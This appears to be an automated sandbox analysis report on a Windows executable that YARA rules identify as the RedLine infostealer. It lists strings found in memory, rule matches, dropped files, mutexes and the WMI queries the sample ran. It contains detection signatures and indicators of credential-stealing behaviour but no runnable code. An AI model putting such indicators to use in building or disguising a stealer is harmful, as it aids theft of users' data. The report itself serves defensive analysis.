                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: I5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: I5pvP0CU6M.exe, VcihjWRO.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: I5pvP0CU6M.exeStatic PE information: invalid certificate
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2227994252.0000000007472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000000.2114643519.0000000000900000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFDQB.exe@ vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2220979591.000000000453A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2219893866.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2228697339.0000000007880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2215309661.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002B12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exeBinary or memory string: OriginalFilenameFDQB.exe@ vs I5pvP0CU6M.exe
                    Source: I5pvP0CU6M.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: I5pvP0CU6M.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: VcihjWRO.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: _0020.AddAccessRule
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, x9bdvNQOCuV2nB7v8T.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, x9bdvNQOCuV2nB7v8T.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, x9bdvNQOCuV2nB7v8T.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: _0020.AddAccessRule
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.cs, Security API names: _0020.AddAccessRule
                    Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@23/103@1/1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, File created: C:\Users\user\AppData\Roaming\VcihjWRO.exe
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Mutant created: \Sessions\1\BaseNamedObjects\WUAHQdDyeTGYRKlWZxfOxFZaJzJ
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, File created: C:\Users\user\AppData\Local\Temp\tmp4733.tmp
                    Source: I5pvP0CU6M.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, File read: C:\Users\user\Desktop\desktop.ini
